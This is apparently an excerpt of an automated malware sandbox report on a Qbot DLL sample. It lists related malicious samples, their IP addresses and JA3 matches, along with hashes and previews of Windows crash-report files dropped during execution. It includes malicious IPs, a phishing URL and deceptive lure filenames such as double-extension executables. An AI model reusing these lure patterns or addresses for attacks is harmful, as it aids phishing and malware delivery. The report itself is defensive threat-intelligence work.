	042_qbot.dll	Get hash	malicious	Qbot	Browse	38.2.18.164
	042_qbot.dll	Get hash	malicious	Qbot	Browse	38.2.18.164
	https://1uvb4gp37m-teamsharpoin2-sbs.translate.goog/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp	Get hash	malicious	Unknown	Browse	38.34.185.163
	file.exe	Get hash	malicious	FormBook, GuLoader	Browse	38.59.83.97
	278857944198_#U53d1#U7968_(2).exe	Get hash	malicious	AveMaria, UACMe	Browse	50.7.90.50
	AgULhRm1jv.elf	Get hash	malicious	Mirai	Browse	154.30.85.67
	naMIV4vu9Y.elf	Get hash	malicious	Mirai	Browse	38.223.141.61
	766X0ABLoy.elf	Get hash	malicious	Mirai	Browse	38.7.5.5
	b9LW1UgHuq.elf	Get hash	malicious	Mirai	Browse	38.211.154.4
	rrRj18GAAe.elf	Get hash	malicious	Mirai	Browse	38.230.105.74
	Astra.x86.elf	Get hash	malicious	Gafgyt, Mirai	Browse	154.60.6.224
	OLM8Aa9n3h.elf	Get hash	malicious	Mirai	Browse	154.7.198.78
	sora.x86.elf	Get hash	malicious	Mirai	Browse	149.33.222.173
	SGm02941x4.elf	Get hash	malicious	Mirai	Browse	149.120.123.92
	Q6ZJW4FzBK.elf	Get hash	malicious	Mirai	Browse	154.7.149.97
	FYjHTx8oPl.elf	Get hash	malicious	Mirai	Browse	216.28.163.249
	RHlXQuM27O.exe	Get hash	malicious	FormBook, GuLoader	Browse	38.59.83.97
	9V3HJzFR2C.elf	Get hash	malicious	Mirai	Browse	216.28.37.18
	pw5tgKfhDO.elf	Get hash	malicious	Mirai	Browse	38.223.253.163

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	042_qbot.dll	Get hash	malicious	Qbot	Browse	68.87.41.40
	curriculum_vitae-copie.vbs	Get hash	malicious	Xmrig	Browse	68.87.41.40
	ornot.exe	Get hash	malicious	Unknown	Browse	68.87.41.40
	Athermous.exe	Get hash	malicious	FormBook, GuLoader	Browse	68.87.41.40
	A08000143_ESP_B64891013_ESP_823041009945_20230405.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	68.87.41.40
	shipping_documents.docx.doc	Get hash	malicious	HTMLPhisher	Browse	68.87.41.40
	EXTRACTO_BANCARIO.PDF.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	68.87.41.40
	RFQ-06062023.exe	Get hash	malicious	BluStealer, ThunderFox Stealer, a310Logger	Browse	68.87.41.40
	FOB $Corporation new Order.docx	Get hash	malicious	Unknown	Browse	68.87.41.40
	mallox.bin.exe	Get hash	malicious	Targeted Ransomware, TrojanRansom	Browse	68.87.41.40
	tu6VhUORSY.exe	Get hash	malicious	Redosdru	Browse	68.87.41.40
	file.exe	Get hash	malicious	Djvu	Browse	68.87.41.40
	file.exe	Get hash	malicious	Vidar	Browse	68.87.41.40
	Sii_NopagadaFacMarzo.msi	Get hash	malicious	Unknown	Browse	68.87.41.40
	Document_5_june_54687.exe	Get hash	malicious	Unknown	Browse	68.87.41.40
	doc7f6ce54a31c775a60c96c262f18bc698.xlsx	Get hash	malicious	NetSupport RAT	Browse	68.87.41.40
	Factmarzosiinopagada.msi	Get hash	malicious	Unknown	Browse	68.87.41.40
	rFishhook_1_.exe	Get hash	malicious	FormBook, GuLoader	Browse	68.87.41.40
	facturanopagamarzoSii.msi	Get hash	malicious	Unknown	Browse	68.87.41.40
	Archd.exe	Get hash	malicious	FormBook, GuLoader	Browse	68.87.41.40

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_419b281e7a1c62a2cfa3b86aa4ad63773747ea5_82810a17_1d45f7cb\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9066207430618478
Encrypted:	false
SSDEEP:	192:cViyb40oXbHBUZMX4jed+U/u7syS274ItWc:qiyb+X7BUZMX4jeh/u7syX4ItWc
MD5:	169D511F0C95CDEDB873F20E357E4D18
SHA1:	F42F40520E11B62749552AF21191B275EF70D272
SHA-256:	AE324FB16CA220D071E6509A4CAA89656A5B62CB9F7110D839A0856313187E1D
SHA-512:	6D659A4968D866D59667123628D10C570822CF0DE176E50752FE58080EB0109DBA5638A14F8AD24B5A17291BBF0F129E4AD8AA9A9A9C2E9FB8FED3DAA2981436
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.0.5.8.1.1.5.4.6.0.6.7.0.6.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.0.5.8.1.1.5.5.5.1.2.9.5.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.9.2.3.b.0.3.-.2.5.f.e.-.4.f.0.f.-.8.4.9.2.-.7.2.0.c.c.1.a.6.b.5.2.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.e.4.3.7.d.4.4.-.9.3.c.7.-.4.5.e.a.-.b.1.1.c.-.2.5.2.4.7.1.8.f.f.b.7.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.b.4.-.0.0.0.1.-.0.0.1.f.-.6.9.0.5.-.f.9.e.6.e.d.9.8.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_419b281e7a1c62a2cfa3b86aa4ad63773747ea5_82810a17_1d5df7cb\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9063246894729109
Encrypted:	false
SSDEEP:	192:22Aci440oXxHBUZMX4jed+U/u7syS274ItWc:BAci4+XBBUZMX4jeh/u7syX4ItWc
MD5:	E6AA0E9B8403B9BBC44D145D121987A3
SHA1:	1DD127A3C66AC722BB272B311F6560805AB2AE9F
SHA-256:	500D7E7A43E8089E04982D8DC37277392F0D6AB06913A284AD3BF7CEC534FA58
SHA-512:	EACBC653501DD50BA20B462BB761875731060496B1AF3923F456646343CA74E212E53C1278976E54F8D70240BFEB2DA82950D31C249FF7D4F84F74D48EE792C4
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.0.5.8.1.1.5.4.4.4.3.5.6.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.0.5.8.1.1.5.5.3.9.6.6.9.4.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.f.2.c.9.2.4.c.-.a.b.3.3.-.4.9.2.4.-.b.c.6.e.-.c.5.5.d.f.7.8.8.9.8.2.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.9.8.8.5.b.f.-.2.8.7.3.-.4.a.6.3.-.b.3.f.f.-.8.3.7.7.c.f.8.f.4.c.0.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.c.0.-.0.0.0.1.-.0.0.1.f.-.c.4.3.e.-.f.e.e.6.e.d.9.8.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_419b281e7a1c62a2cfa3b86aa4ad63773747ea5_82810a17_1e260587\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9060277039144707
Encrypted:	false
SSDEEP:	192:7Gic40oXPHBUZMX4jed+U/u7syS274ItWc:yic+XPBUZMX4jeh/u7syX4ItWc
MD5:	10483F8EA7B33042994DDD51A6168DFA
SHA1:	F243962BEC8015C7E4B61CF3F0A9ED0A4F7BDAEB
SHA-256:	EFBBE1CB574E63C46BE9DC5BE369B38D498DAF7C3E2D2433853C8FABC8943276
SHA-512:	115FE6D4A36C2253C11C0B22CE4045A7DDC16F575479042F0369B76F547C9F9BA433A237A9C7727531BFF266D896AC10C2ED9E8076F9D1596A3FB0397D7D6E5C
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.0.5.8.1.1.6.3.4.6.1.0.1.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.0.5.8.1.1.6.4.3.6.7.2.6.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.1.9.3.3.a.e.-.2.a.c.d.-.4.a.1.5.-.8.c.f.7.-.4.d.7.b.7.c.f.d.c.b.c.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.c.b.6.f.b.9.-.9.9.8.9.-.4.2.4.5.-.a.5.4.7.-.1.1.3.d.0.b.2.4.6.6.d.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.d.c.-.0.0.0.1.-.0.0.1.f.-.8.1.a.7.-.6.a.e.c.e.d.9.8.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_f72750b22a9214184114f6be25e810eecaece948_82810a17_1e060623\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9063464210323204
Encrypted:	false
SSDEEP:	192:9RhniK40oX3HBUZMX4jed+U/u7syS274ItWcM:7hniK+XXBUZMX4jeh/u7syX4ItWc
MD5:	212AD9C3E724A63688ABD20855A8BE96
SHA1:	4CAFE7B4041B0E137282E6572D23682B482D9BD3
SHA-256:	07E0AEBD96798BB9CE4988210C5DBB0E4BBC2E26DD5825BA5ACB0C35B6F18070
SHA-512:	82FAFFB5316BD203084AE243D994DE31371060319F12348D3296C334C993D1FEFD3EF9FC838A1A832542BDC956ADB6EFF79EB1D9447D21B6EFA8D88CE156C539
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.0.5.8.1.1.6.3.7.1.6.7.3.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.0.5.8.1.1.6.4.6.6.9.8.4.6.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.2.f.8.b.3.c.-.c.9.d.d.-.4.0.6.3.-.a.b.3.7.-.0.6.9.c.c.8.9.8.d.9.4.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.e.4.f.f.0.8.-.3.4.5.1.-.4.f.b.c.-.b.c.6.b.-.4.1.7.7.3.b.4.5.a.4.7.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.2.4.-.0.0.0.1.-.0.0.1.f.-.b.2.c.5.-.a.5.e.c.e.d.9.8.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER171.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8238
Entropy (8bit):	3.6875671559623218
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiS567k6Y+TQL6zgmfTLSRCpr789bwosfuMwm:RrlsNis6Y6YXL6zgmfTLSNwbfu6
MD5:	CEB69329E5DF5148A263C463F8243A6A
SHA1:	052187542026E6A0A179EC3DF60FF4E4AF940580
SHA-256:	DEC2380EA8B8E65A7A26C0D6488040E5A9F700EC3F31B54759D33BBCD15C17D0
SHA-512:	D57841A8D7EA8AC52DB29EB1F8E26F7CA89D6052B4CD286499280596A2A51F529657866D57E0BDF3ABC9ED86B0E84CFB5193783AAE53414B07241AF995258C0A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.1.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1CF.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	4.443916631030679
Encrypted:	false
SSDEEP:	48:cvIwSD8zshJgtWI9OM//rWgc8sqYjt8fm8M4JCdspFNY+q8/MMu4SrS0d:uITfzE/agrsqYuJonDW0d
MD5:	6585F702E3794663FF1A871B349EA7E2
SHA1:	5325AD1ECF61FC325DD5E9CB9796A7CB4D0B1543
SHA-256:	3A78ABB2FF5E54B8B9F465CEAAD0A69F1BAD1362C908939EA8CC5F0BB766086A
SHA-512:	BBDAEED9098A37956A63E9B1622E87A73C6323675D7F3F6BA86EF05A8EEF42DC2C69EB723FFAC174289FE3446F09AE8BA08847EB2845161B34E1FA8677CA4559
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2074343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER77.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8238
Entropy (8bit):	3.6877037749825883
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNis26r6Y+TQ+6zgmfTTSRCprz89bPNsfplm:RrlsNit6r6YX+6zgmfTTSlPGfy
MD5:	FD051D2F33FCA92E0CF472AB77365483
SHA1:	4AF645FEEB6AAAD15FE8F7AE69DD3BA5558B1B0E
SHA-256:	9B53177523219B0DCD5D29303172A897FFDCF834F0377F967804269AF166CC68
SHA-512:	277DB67280E24F668B72C7D2D804143E3B85DA4777A1D9B060242A31B6CC060FB33A83F6525A0AFB58E7E5AB5EA6980BBAB2F5F56816C52E07FDA6D1195858A6
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.4.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA7.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	4.447214550012027
Encrypted:	false
SSDEEP:	48:cvIwSD8zshJgtWI9OM//rWgc8sqYj4sF8fm8M4JCdspFd+q8/M94SrSzd:uITfzE/agrsqY+JXVDWzd
MD5:	3445EB48C4F8125D68F2614B69A7944D
SHA1:	67D1EA24FB282B73F04A1ECE4BB716C338DB5E57
SHA-256:	74F06C7F48F529EF5D4AE1DEE96B55CE79621B12FC9E25206FD6B30D52A15394
SHA-512:	3B47B87CA076B73644199B536B9BDD75450C6581986DEE40A126BE105B8140B9AC14B0CA9A094D8BEB07F657260587664C9182BBF14971243E3402C2CAC3E650
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2074343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDBA8.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Jun 7 03:12:34 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	37022
Entropy (8bit):	2.3212349811459285
Encrypted:	false
SSDEEP:	192:PoPpZ53+c+s3rRO5SkbJSIN0iiuQxlZZNohBnW:YD+F5LbJtViJZYW
MD5:	7E3CC1E84B9A701683E3F1BA55AC5853
SHA1:	71D6A87E6E828FD871D8B8FC4CB10B98106CF70B
SHA-256:	8898678271CCDFD7C50E51C824B10D9CAD5834C18633462FFE79A779B8671727
SHA-512:	FA9BA32EDB462E8222E1F698FA812310049DBBACC3D9306764EBDF2D01CF8D2503483FE47E907F70B0C1A533B0CAFCC5F7B2B70AC27AC0932D3359EE8BFE2AB5
Malicious:	false
Preview:	MDMP....... ..........d............d...............l............)..........T.......8...........T...........P...Nv...........................................................................................U...........B..............GenuineIntelW...........T..............d.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC44.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Jun 7 03:12:34 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	46194
Entropy (8bit):	2.0466594984783146
Encrypted:	false
SSDEEP:	192:P/ShQxZRHO5SkbVx3AiZxBjWbpjQajSw+dSgfxg4zLnC:2k45LbVx3AiZx6jQeJgf7C
MD5:	6E58F0E10A6E2E38DE00971791FA43F4
SHA1:	24D9C1900E663D20BB2A064FAD40C145BC7A7D28
SHA-256:	84549194E014320234440A541916433CB7C153CEA2B657A572A47B39E3552930
SHA-512:	D997309D49D8C78ACA0E9CF7B87298CB795B68999399DFF91FD24D4D2A0FA042420353DBF13CD9C366214F3384CBBA374BBAFDBB45B137149B5A2699B7BF7C33
Malicious:	false
Preview:	MDMP....... ..........d.........................................,..........T.......8...........T...............r...........0................................................................................U...........B..............GenuineIntelW...........T..............d.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD10.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8244
Entropy (8bit):	3.6869774540447073
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiXd6W6YzI6ygmfTTSRCprO89bH/sf2tm:RrlsNiN6W6Yc6ygmfTTSmHkf9
MD5:	819244432D524A50A4FA7BC4893D29B7
SHA1:	75B2EA4F29A358FABE833733126D2656216ECDD4
SHA-256:	D1EB7A88DE74983D27CFC5FB084F1206D1ECD76D35B15BC7D7432D759C500305
SHA-512:	A5557EE00C34AEE23DE800C16A5119A0436FDABFEB0BDB6126535F59469E4C24B61B4E187FA5160ECB8D85AD55FF0BE5652C60881C7DB8ABF00EDFBC3CB8DE85
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.6.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD6E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8248
Entropy (8bit):	3.686976676287553
Encrypted:	false
